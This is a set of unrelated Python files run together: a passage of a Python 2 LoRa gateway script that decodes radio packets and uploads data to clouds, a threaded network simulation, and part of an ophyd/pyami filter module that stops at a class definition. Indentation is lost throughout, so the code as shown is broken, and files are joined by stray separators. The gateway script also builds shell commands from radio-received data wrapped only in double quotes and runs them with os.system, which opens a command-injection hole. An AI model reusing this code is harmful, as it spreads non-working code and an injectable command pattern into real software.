_linebuf=sys.stdin.read(n)
#////////////////////////////////////////////////////////////
# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES
#////////////////////////////////////////////////////////////
_folder_path = "/home/pi/Dropbox/LoRa-test/"
_web_folder_path = "/var/www/html/"
_telemetrylog_filename = _folder_path+"telemetry_"+str(_gwid)+".log"
_imagelog_filename = _folder_path+"image_"+str(_gwid)+".log"
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#open clouds.json file to get enabled clouds
#------------------------------------------------------------
from clouds_parser import retrieve_enabled_clouds
#get a copy of the list of enabled clouds
_enabled_clouds=retrieve_enabled_clouds()
print "post_processing_gw.py got cloud list: "
print _enabled_clouds
#------------------------------------------------------------
#open clouds.json file to get clouds for encrypted data
#------------------------------------------------------------
_cloud_for_encrypted_data=retrieve_enabled_clouds("encrypted_clouds")
print "post_processing_gw.py got encrypted cloud list: "
print _cloud_for_encrypted_data
_cloud_for_lorawan_encrypted_data=retrieve_enabled_clouds("lorawan_encrypted_clouds")
print "post_processing_gw.py got LoRaWAN encrypted cloud list: "
print _cloud_for_lorawan_encrypted_data
#------------------------------------------------------------
#start various threads
#------------------------------------------------------------
#gateway dht22
if (_gw_dht22):
print "Starting thread to measure gateway temperature"
sys.stdout.flush()
t_dht22 = threading.Thread(target=dht22_target)
t_dht22.daemon = True
t_dht22.start()
#downlink feature
if (_gw_downlink):
#check for an existing downlink-post-queued.txt file
#
print datetime.datetime.now()
print "post downlink: checking for existing "+_post_downlink_queued_file
if os.path.isfile(os.path.expanduser(_post_downlink_queued_file)):
lines = []
print "post downlink: reading existing "+_post_downlink_queued_file
f = open(os.path.expanduser(_post_downlink_queued_file),"r")
lines = f.readlines()
f.close()
for line in lines:
if len(line) > 1 or line != '\n':
line_json=json.loads(line)
#print line_json
if line_json["status"]=="send_request":
pending_downlink_requests.append(line)
print "post downlink: start with current list of pending downlink requests"
for downlink_request in pending_downlink_requests:
print downlink_request.replace('\n','')
else:
print "post downlink: none existing downlink-post-queued.txt"
print "Loading lib to compute downlink MIC"
from loraWAN import loraWAN_get_MIC
print "Starting thread to check for downlink requests every %d seconds" % _gw_downlink
sys.stdout.flush()
t_downlink = threading.Thread(target=downlink_target)
t_downlink.daemon = True
t_downlink.start()
time.sleep(1)
#status feature
if (_gw_status):
print "Starting thread to perform periodic gw status/tasks"
sys.stdout.flush()
t_status = threading.Thread(target=status_target)
t_status.daemon = True
t_status.start()
time.sleep(1)
#copy post_processing feature
#TODO: integrate copy post_processing feature into periodic status/tasks?
if (_gw_copy_post_processing):
print "Starting thread to copy post_processing.log"
sys.stdout.flush()
t_status = threading.Thread(target=copy_post_processing_target)
t_status.daemon = True
t_status.start()
time.sleep(1)
print ''
print "Current working directory: "+os.getcwd()
#------------------------------------------------------------
#main loop
#------------------------------------------------------------
while True:
sys.stdout.flush()
ch = getSingleChar()
#expected prefixes
# ^p indicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet
# example: ^p1,16,3,0,234,8,-45
#
# ^r indicate a ctrl radio info ^rbw,cr,sf for the last received packet
# example: ^r500,5,12
#
# ^$ indicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file
# example: ^$Set LoRa mode 4
#
# ^l indicates a ctrl LAS info ^lsrc(%d),type(%d)
# type is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA
# example: ^l3,4
#
# \$ indicates a message that should be logged in the (Dropbox) telemetry.log file
# example: \$hello -> hello will be logged in the following format
# (src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello
#
#
# \! indicates a message that should be logged on a cloud, see clouds.json
#
# example for a ThingSpeak channel as implemented in CloudThinkSpeak.py
# \!SGSH52UGPVAUYG3S#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1
# \!2#9.4 -> 9.4 will be logged in the default channel at field 2
# \!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2
# \!##9.4 or \!9.4 -> will be logged in default channel and field
#
	# you can add nomenclature codes:
# \!##TC/9.4/HU/85/DO/7 -> with ThingSpeak you can either upload only the first value or all values on several fields
# -> with an IoT cloud such as Grovestreams you will be able to store both nomenclatures and values
#
# you can log other information such as src, seq, len, SNR and RSSI on specific fields
#
# \xFF\xFE indicates radio data prefix
#
# \xFF\x50-\x54 indicates an image packet. Next fields are src_addr(2B), seq(1B), Q(1B), size(1B)
# cam id is coded with the second framing byte: i.e. \x50 means cam id = 0
#
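	# as a worked example, the ^p line "^p1,16,3,0,234,8,-45" decodes below to
	# dst=1 type=0x10(DATA) src=3 seq=0 len=234 SNR=8 RSSI=-45
	#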
#------------------------------------------------------------
# '^' is reserved for control information from the gateway
#------------------------------------------------------------
if (ch=='^'):
now = datetime.datetime.now()
ch=sys.stdin.read(1)
if (ch=='p'):
pdata = sys.stdin.readline()
print now.isoformat()
print "rcv ctrl pkt info (^p): "+pdata,
arr = map(int,pdata.split(','))
print "splitted in: ",
print arr
dst=arr[0]
ptype=arr[1]
ptypestr="N/A"
if ((ptype & 0xF0)==PKT_TYPE_DATA):
ptypestr="DATA"
if (ptype & PKT_FLAG_DATA_DOWNLINK)==PKT_FLAG_DATA_DOWNLINK:
ptypestr = ptypestr + " DOWNLINK"
if (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:
ptypestr = ptypestr + " WAPPKEY"
if (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:
ptypestr = ptypestr + " ENCRYPTED"
if (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:
ptypestr = ptypestr + " ACK_REQ"
if ((ptype & 0xF0)==PKT_TYPE_ACK):
ptypestr="ACK"
src=arr[2]
seq=arr[3]
datalen=arr[4]
SNR=arr[5]
RSSI=arr[6]
if (_rawFormat==0):
info_str="(dst=%d type=0x%.2X(%s) src=%d seq=%d len=%d SNR=%d RSSI=%d)" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)
else:
info_str="rawFormat(len=%d SNR=%d RSSI=%d)" % (datalen,SNR,RSSI)
print info_str
#TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file
#here we check for pending downlink message that need to be sent back to the end-device
#
for downlink_request in pending_downlink_requests:
request_json=json.loads(downlink_request)
if (request_json["dst"]==0) or (src == request_json["dst"]):
print "post downlink: receive from %d with pending request" % src
if (request_json["dst"]==0):
print "in broadcast mode"
else:
print "in unicast mode"
print "post downlink: downlink data is \"%s\"" % request_json["data"]
print "post downlink: generate "+_gw_downlink_file+" from entry"
print downlink_request.replace('\n','')
#generate the MIC corresponding to the clear data and the destination device address
#it is possible to have a broadcast address but since the only device that is listening
#is the one that has sent a packet, there is little interest in doing so
#so currently, we use the sending device's address to compute the MIC
MIC=loraWAN_get_MIC(src,request_json["data"])
#add the 4 byte MIC information into the json line
request_json['MIC0']=hex(MIC[0])
request_json['MIC1']=hex(MIC[1])
request_json['MIC2']=hex(MIC[2])
request_json['MIC3']=hex(MIC[3])
downlink_json=[]
downlink_json.append(request_json)
f = open(os.path.expanduser(_gw_downlink_file),"a")
print "post downlink: write"
for downlink_json_line in downlink_json:
#print downlink_json_line
print json.dumps(downlink_json_line)
f.write(json.dumps(downlink_json_line)+'\n')
f.close()
pending_downlink_requests.remove(downlink_request)
#update downlink-post-queued.txt
f = open(os.path.expanduser(_post_downlink_queued_file),"w")
for downlink_request in pending_downlink_requests:
f.write("%s" % downlink_request)
#TODO: should we write all pending request for this node
#or only the first one that we found?
#currently, we do only the first one
break;
if (ch=='r'):
rdata = sys.stdin.readline()
print "rcv ctrl radio info (^r): "+rdata,
arr = map(int,rdata.split(','))
print "splitted in: ",
print arr
bw=arr[0]
cr=arr[1]
sf=arr[2]
info_str="(BW=%d CR=%d SF=%d)" % (bw,cr,sf)
print info_str
if (ch=='t'):
tdata = sys.stdin.readline()
print "rcv timestamp (^t): "+tdata
if (ch=='l'):
#TODO: LAS service
print "not implemented yet"
if (ch=='$'):
data = sys.stdin.readline()
print data,
			#when the low-level gateway program resets the radio module it will send "^$Resetting the radio module"
if 'Resetting' in data:
if _use_mail_alert:
print "post_processing_gw.py sends mail indicating that gateway has reset radio module..."
if checkNet():
send_alert_mail("Gateway "+_gwid+" has reset its radio module")
print "Sending mail done"
if _use_sms_alert:
print "post_processing_gw.py sends SMS indicating that gateway has reset radio module..."
success = libSMS.send_sms(sm, "Gateway "+_gwid+" has reset its radio module", contact_sms)
if (success):
print "Sending SMS done"
continue
#------------------------------------------------------------
# '\' is reserved for message logging service
#------------------------------------------------------------
if (ch=='\\' and _hasRadioData==True):
_hasRadioData=False
now = datetime.datetime.now()
if _validappkey==1:
print "valid app key: accept data"
ch=getSingleChar()
if (ch=='$'): #log in a file
data = getAllLine()
print "rcv msg to log (\$) in log file: "+data,
f=open(os.path.expanduser(_telemetrylog_filename),"a")
f.write(info_str+' ')
f.write(now.isoformat()+'> ')
f.write(data)
f.close()
#/////////////////////////////////////////////////////////////
# YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS
				# WE PROVIDE EXAMPLES FOR THINGSPEAK, GROVESTREAMS
				# IT IS ADVISED TO USE A SEPARATE PYTHON SCRIPT PER CLOUD
#////////////////////////////////////////////////////////////
#log on clouds: thingspeak, grovestreams, sensorcloud,...
#or even on MongoDB as it is declared as a regular cloud
#enabled clouds must be declared in clouds.json
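				#for illustration (values below are made up), with the ThingSpeak example above
				#("\!SGSH52UGPVAUYG3S#9.4") and a single enabled cloud script, the cmd_arg built
				#below would look like:
				#  <cloud script> "SGSH52UGPVAUYG3S#9.4" "1,16,3,0,10,8,-45" "500,5,12" "2017-10-16T14:47:44" "<gw id>"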
elif (ch=='!'):
ldata = getAllLine()
if (dateutil_tz==True):
#replacing tdata to get time zone information when uploading to clouds
localdt = datetime.datetime.now(dateutil.tz.tzlocal())
tdata = localdt.replace(microsecond=0).isoformat()
print "number of enabled clouds is %d" % len(_enabled_clouds)
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_enabled_clouds)):
try:
print "--> cloud[%d]" % cloud_index
cloud_script=_enabled_clouds[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+ldata.replace('\n','').replace('\0','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to the cloud"
print "--> cloud end"
#END
#////////////////////////////////////////////////////////////
else:
#not a known data logging prefix
#you may want to upload to a default service
#so just implement it here
print "unrecognized data logging prefix: discard data"
getAllLine()
else:
print "invalid app key: discard data"
getAllLine()
continue
#handle low-level gateway data
if (ch == LL_PREFIX_1):
print "got first framing byte"
ch=getSingleChar()
#data from low-level LoRa gateway?
if (ch == LL_PREFIX_LORA):
#the data prefix is inserted by the gateway
#do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)
print "--> got LoRa data prefix"
radio_type=LORA_RADIO
#if SNR < -20:
# print "--> SNR too low, discarding data"
# sys.stdin.readline()
# continue
_hasRadioData=True
#we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage
#if _wappkey is set then we have to first indicate that _validappkey=0
if (_wappkey==1):
_validappkey=0
else:
_validappkey=1
#if we have raw output from gw, then try to determine which kind of packet it is
#
if (_rawFormat==1):
print "raw format from LoRa gateway"
ch=getSingleChar()
#probably our modified Libelium header where the destination (i.e. 1) is the gateway
#dissect our modified Libelium format
if ord(ch)==1:
dst=ord(ch)
ptype=ord(getSingleChar())
src=ord(getSingleChar())
seq=ord(getSingleChar())
print "Header[dst=%d ptype=0x%.2X src=%d seq=%d]" % (dst,ptype,src,seq)
#now we read datalen-4 (the header length) bytes in our line buffer
fillLinebuf(datalen-HEADER_SIZE)
datalen=datalen-HEADER_SIZE
pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
print "update ctrl pkt info (^p): "+pdata
#LoRaWAN uses the MHDR(1B)
#----------------------------
#| 7 6 5 | 4 3 2 | 1 0 |
#----------------------------
# 0 1 0 0 0 0 0 0 unconfirmed data up
# 1 0 0 0 0 0 0 0 confirmed data up
# MType RFU major
#
#the main MType is unconfirmed data up b010 or confirmed data up b100
#and packet format is as follows, payload starts at byte 9
#MHDR[1] | DevAddr[4] | FCtrl[1] | FCnt[2] | FPort[1] | EncryptedPayload | MIC[4]
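#added commented example (not in the original script) of how these offsets are
#used below, for a raw frame held in lorapkt as a list of byte values:
#  lorapkt[0]                  -> MHDR (0x40 unconfirmed data up, 0x80 confirmed data up)
#  lorapkt[1..4]               -> DevAddr, least significant byte first
#  lorapkt[7]*256+lorapkt[6]   -> FCnt (frame counter)
#so a frame starting with 0x40 0x04 0x03 0x02 0x01 yields DevAddr 0x01020304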
if ord(ch) & 0x40 == 0x40 or ord(ch) & 0x80 == 0x80:
#Do the LoRaWAN decoding
print "LoRaWAN?"
fillLinebuf(datalen-1)
lorapktstr=ch+getAllLine()
lorapkt=[]
for i in range (0,len(lorapktstr)):
lorapkt.append(ord(lorapktstr[i]))
#you can uncomment/comment this display if you want
print [hex(x) for x in lorapkt]
datalen=datalen-LORAWAN_HEADER_SIZE
src = lorapkt[4]*256*256*256
src += lorapkt[3]*256*256
src += lorapkt[2]*256
src += lorapkt[1]
seq=lorapkt[7]*256+lorapkt[6]
#just to print the src in 0x01020304 form
pdata="%d,%d,%s,%d,%d,%d,%d" % (256,ord(ch),"0x%0.8X" % src,seq,datalen,SNR,RSSI)
print "update ctrl pkt info (^p): "+pdata
#internally, we convert in int
pdata="%d,%d,%d,%d,%d,%d,%d" % (256,ord(ch),src,seq,datalen,SNR,RSSI)
if _local_aes==1:
from loraWAN import loraWAN_process_pkt
try:
plain_payload=loraWAN_process_pkt(lorapkt)
except:
print "### unexpected decryption error ###"
plain_payload="###BADMIC###"
if plain_payload=="###BADMIC###":
print plain_payload
else:
print "plain payload is : ",
print(replchars.sub(replchars_to_hex, plain_payload))
#if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY):
# the_app_key = plain_payload[0]
# the_app_key = the_app_key + plain_payload[1]
# the_app_key = the_app_key + plain_payload[2]
# the_app_key = the_app_key + plain_payload[3]
# print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key),
# print plain_payload[APPKEY_SIZE:]
#else:
# print plain_payload
_linebuf = plain_payload
_has_linebuf=1
_hasClearData=1
else:
print "--> DATA encrypted: local aes not activated"
lorapktstr_b64=base64.b64encode(lorapktstr)
print "--> FYI base64 of LoRaWAN frame w/MIC: "+lorapktstr_b64
print "--> number of enabled clouds is %d" % len(_cloud_for_lorawan_encrypted_data)
if len(_cloud_for_lorawan_encrypted_data)==0:
print "--> discard encrypted data"
else:
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_cloud_for_lorawan_encrypted_data)):
try:
print "--> LoRaWAN encrypted cloud[%d]" % cloud_index
cloud_script=_cloud_for_lorawan_encrypted_data[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+lorapktstr_b64.replace('\n','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to LoRaWAN encrypted cloud"
print "--> LoRaWAN encrypted cloud end"
continue
else:
#now we read datalen bytes in our line buffer
fillLinebuf(datalen)
#encrypted data payload?
if ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):
print "--> DATA encrypted: encrypted payload size is %d" % datalen
_hasClearData=0
lorapktstr=getAllLine()
if _local_aes==1:
print "--> decrypting in AES-CTR mode (LoRaWAN version)"
lorapkt=[]
for i in range (0,len(lorapktstr)):
lorapkt.append(ord(lorapktstr[i]))
from loraWAN import loraWAN_process_pkt
try:
plain_payload=loraWAN_process_pkt(lorapkt)
except:
print "### unexpected decryption error ###"
plain_payload="###BADMIC###"
if plain_payload=="###BADMIC###":
print plain_payload
else:
print "plain payload is : ",
print(replchars.sub(replchars_to_hex, plain_payload))
#if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY):
# the_app_key = plain_payload[0]
# the_app_key = the_app_key + plain_payload[1]
# the_app_key = the_app_key + plain_payload[2]
# the_app_key = the_app_key + plain_payload[3]
# print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key),
# print plain_payload[APPKEY_SIZE:]
#else:
# print plain_payload
_linebuf = plain_payload
_has_linebuf=1
_hasClearData=1
#remove the data encrypted flag
ptype = ptype & (~PKT_FLAG_DATA_ENCRYPTED)
pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
print '--> changed packet type to clear data'
else:
print "--> DATA encrypted: local aes not activated"
lorapktstr_b64=base64.b64encode(lorapktstr)
print "--> FYI base64 of LoRaWAN frame w/MIC: "+lorapktstr_b64
print "--> number of enabled clouds is %d" % len(_cloud_for_encrypted_data)
if len(_cloud_for_encrypted_data)==0:
print "--> discard encrypted data"
else:
#update pdata with new data length
pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_cloud_for_encrypted_data)):
try:
print "--> encrypted cloud[%d]" % cloud_index
cloud_script=_cloud_for_encrypted_data[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+lorapktstr_b64.replace('\n','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to encrypted cloud"
print "--> encrypted cloud end"
else:
_hasClearData=1
#with_appkey?
if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1):
print "--> DATA with_appkey: read app key sequence"
the_app_key = getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
print "app key is ",
print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key)
if _wappkey==1:
if the_app_key in key_AppKey.app_key_list:
print "in app key list"
_validappkey=1
else:
print "not in app key list"
_validappkey=0
else:
print "app key disabled"
_validappkey=1
continue
if (ch >= '\x50' and ch <= '\x54'):
print "--> got image packet"
cam_id=ord(ch)-0x50;
src_addr_msb = ord(getSingleChar())
src_addr_lsb = ord(getSingleChar())
src_addr = src_addr_msb*256+src_addr_lsb
seq_num = ord(getSingleChar())
Q = ord(getSingleChar())
data_len = ord(getSingleChar())
if (src_addr in nodeL):
#already in list
#get the file handler
theFile=fileH[src_addr]
#TODO
#start some timer to remove the node from nodeL
else:
#new image packet from this node
nodeL.append(src_addr)
filename =(_folder_path+"images/ucam_%d-node_%.4d-cam_%d-Q%d.dat" % (imgSN,src_addr,cam_id,Q))
print "first pkt from node %d" % src_addr
print "creating file %s" % filename
theFile=open(os.path.expanduser(filename),"w")
#associates the file handler to this node
fileH.update({src_addr:theFile})
#and associates imageFilename, imgSN, Q and cam_id
imageFilenameA.update({src_addr:filename})
imgsnA.update({src_addr:imgSN})
qualityA.update({src_addr:Q})
camidA.update({src_addr:cam_id})
imgSN=imgSN+1
t = Timer(90, image_timeout)
t.start()
#log only the first packet and the filename
f=open(os.path.expanduser(_imagelog_filename),"a")
f.write(info_str+' ')
now = datetime.datetime.now()
f.write(now.isoformat()+'> ')
f.write(filename+'\n')
f.close()
print "pkt %d from node %d data size is %d" % (seq_num,src_addr,data_len)
print "write to file"
theFile.write(format(data_len, '04X')+' ')
for i in range(1, data_len):
ch=getSingleChar()
#sys.stdout.write(hex(ord(ch)))
#sys.stdout.buffer.write(ch)
print (hex(ord(ch))),
theFile.write(format(ord(ch), '02X')+' ')
print "End"
sys.stdout.flush()
theFile.flush()
continue
if (ch == '?' and _ignoreComment==1):
sys.stdin.readline()
continue
sys.stdout.write(ch)
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.')
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
ami.py
|
import logging
import time
from importlib import import_module
from threading import Thread
import numpy as np
from ophyd.device import Device, Component as Cpt, Staged
from ophyd.signal import Signal
from ophyd.status import Status
from ophyd.utils.errors import ReadOnlyError
from toolz.itertoolz import partition
from .ext_scripts import get_hutch_name, get_ami_proxy
logger = logging.getLogger(__name__)
L3T_DEFAULT = '/reg/neh/operator/{}opr/l3t/amifil.l3t'
# Set uninitialized globals for style-checker
pyami = None
pyami_connected = None
ami_proxy = None
l3t_file = None
monitor_det = None
last_filter_string = None
hutch_name = None
# Define default starting values. Can also use to reset module.
def _reset_globals():
defaults = dict(pyami=None,
pyami_connected=False,
ami_proxy=None,
l3t_file=None,
monitor_det=None,
last_filter_string=None,
hutch_name=None)
globals().update(defaults)
_reset_globals()
def auto_setup_pyami():
"""
Does a best-guess at the ami configuration, if it has not yet been set up.
The steps are:
1. check hutch name
2. determine ami proxy and register it
3. setup default l3t file
4. makes sure pyami is imported and connected to the ami proxy
This will be called the first time pyami is needed. We don't import at the
top of this file because we need to be able to import this file even if
pyami isn't in the environment, which is semi-frequent.
"""
global pyami
global pyami_connected
if None in (ami_proxy, l3t_file):
# get_hutch_name fails if not on nfs
# or on a bad nfs day, so only do if 100% needed
hutch = hutch_name or get_hutch_name()
if ami_proxy is None:
proxy = get_ami_proxy(hutch)
set_pyami_proxy(proxy)
if l3t_file is None:
set_l3t_file(L3T_DEFAULT.format(hutch))
if pyami is None:
logger.debug('importing pyami')
pyami = import_module('pyami')
if not pyami_connected:
logger.debug('initializing pyami')
try:
pyami.connect(ami_proxy)
pyami_connected = True
except Exception:
pyami_connected = False
raise
def set_ami_hutch(name):
"""
Pick the hutch name to skip a shell out to get_hutch_name.
Parameters
----------
name: ``str``
Name of the hutch
"""
global hutch_name
hutch_name = name.lower()
def set_pyami_proxy(proxy):
"""
Pick the hostname or group to use for the pyami connection.
Parameters
----------
proxy: ``str`` or ``int``
Either the server name or group number
"""
global ami_proxy
ami_proxy = proxy
def set_l3t_file(filename):
"""
Pick the file to write out for the l3t trigger
Parameters
----------
filename: ``str``
Full file path
"""
global l3t_file
l3t_file = filename
def set_monitor_det(det):
"""
Designate one `AmiDet` as the monitor.
The monitor det is the default normalization detector and the default
filtering detector when no detector is provided.
Parameters
----------
det: `AmiDet` or ``bool``
The detector to set as the monitor. Alternatively, pass in ``False`` to
disable the monitor det.
"""
global monitor_det
if det:
monitor_det = det
else:
monitor_det = None
def set_pyami_filter(*args, event_codes=None, operator='&', or_bykik=False):
"""
Set up the l3t filters.
These connect through pyami to call set_l3t or clear_l3t. The function
takes in arbitrary dets whose prefixes are the ami names, along with
low and highs.
Event codes are handled as a special case, since you always want high
vs low.
.. note::
If or_bykik is True, this will treat bykik as an l3t pass! This is
so you don't lose your off shots when the l3t trigger is in veto
mode.
Parameters
----------
*args: (`AmiDet`, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. You can omit the first
`AmiDet` as a shorthand for the current monitor, assuming a monitor
has been set with `Daq.set_monitor` or `set_monitor_det`.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when
the event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes.
This can either be ``|`` to ``or`` the conditions together, so
l3pass will happen if any filter passes, or it can be left at
the default ``&`` to ``and`` the conditions together, so l3pass
will only happen if all filters pass.
or_bykik: ``bool``, optional
False by default, appends an ``or`` condition that marks l3t pass
when we see the bykik event code. This makes sure the off shots
make it into the data if we're in l3t veto mode.
"""
global last_filter_string
auto_setup_pyami()
filter_string = dets_filter(*args, event_codes=event_codes,
operator=operator, or_bykik=or_bykik)
if filter_string is None:
pyami.clear_l3t()
else:
pyami.set_l3t(filter_string, l3t_file)
last_filter_string = filter_string
def dets_filter(*args, event_codes=None, operator='&', or_bykik=True):
"""
Return valid l3t/pyami filter strings in a useful format.
The function takes in arbitrary dets whose prefixes are the ami names,
along with low and highs. Event codes are handled as a special case, since
you always want high vs low.
.. note::
By default this will treat bykik as an l3t pass! This is so you don't
lose your off shots when the l3t trigger is in veto mode. You can
disable this with ``or_bykik=False``, but this will remain the default
behavior for backwards compatibility and to prevent someone from losing
shots that they wanted in the data.
Parameters
----------
*args: (`AmiDet`, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. You can omit the first
`AmiDet` as a shorthand for the current monitor, assuming a monitor has
been set with `Daq.set_monitor` or `set_monitor_det`.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when the
event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes. This
can either be ``|`` to ``or`` the conditions together, so l3pass will
happen if any filter passes, or it can be left at the default ``&`` to
``and`` the conditions together, so l3pass will only happen if all
filters pass.
or_bykik: ``bool``, optional
True by default, appends an ``or`` condition that marks l3t pass when
we see the bykik event code. This makes sure the off shots make it into
the data if we're in l3t veto mode.
Returns
-------
filter_string: ``str``
A valid filter string for `AmiDet` or for ``pyami.set_l3t``
"""
filter_strings = []
if len(args) % 3 == 2:
# One arg missing, add the monitor det as first arg
if monitor_det is None:
raise RuntimeError('Did not receive args in a multiple of 3, but '
'monitor_det is not set. Aborting.')
else:
args = [monitor_det] + list(args)
for det, lower, upper in partition(3, args):
if isinstance(det, str):
ami_name = det
elif isinstance(det, AmiDet):
ami_name = det.prefix
else:
raise TypeError('Must use AmiDet or string for filtering!')
filter_strings.append(basic_filter(ami_name, lower, upper))
if event_codes is not None:
for code in event_codes:
filter_strings.append(evr_filter(code))
if len(filter_strings) == 0:
return None
else:
base = concat_filter_strings(filter_strings, operator=operator)
if or_bykik:
bykik = evr_filter(162)
return concat_filter_strings([base, bykik], operator='|')
else:
return base
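# Illustrative sketch (added note, not part of the original module), assuming a
# made-up ami name 'HYPO:IPM:01':
#
#   dets_filter('HYPO:IPM:01', 0.1, 1.0, event_codes=[42])
#
# returns '((0.1<HYPO:IPM:01<1.0)&(0.1<DAQ:EVR:Evt42<2))|(0.1<DAQ:EVR:Evt162<2)',
# where the trailing term comes from or_bykik=True (bykik event code 162).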
def basic_filter(ami_name, lower, upper):
"""
Helper function for creating an ami filter string.
Parameters
----------
ami_name: ``str``
The name of the value in ami
lower: ``float``
The lower bound for the value to pass
upper: ``float``
The upper bound for the value to pass
Returns
-------
filter_string: ``str``
"""
return '{}<{}<{}'.format(lower, ami_name, upper)
def evr_filter(event_code):
"""
Helper function that creates a filter for a certain event code.
Parameters
----------
event_code: ``int``
The event code to create a filter for
Returns
-------
filter_string: ``str``
"""
evr_base = 'DAQ:EVR:Evt{}'
return basic_filter(evr_base.format(event_code), 0.1, 2)
def concat_filter_strings(filter_strings, operator='&'):
"""
Helper function to combine ami filter strings
Parameters
----------
filter_strings: ``list``
The valid filter strings to combine
operator: ``str``
The operator to place between the filter strings. This can either be
``&`` or ``|``, for ``and`` or ``or`` respectively.
"""
if len(filter_strings) == 0:
raise ValueError('filter_strings must have at least one element')
elif len(filter_strings) == 1:
return filter_strings[0]
else:
sep = ')' + operator + '('
return '(' + sep.join(filter_strings) + ')'
class AmiDet(Device):
"""
Detector that gets data from pyami scalars.
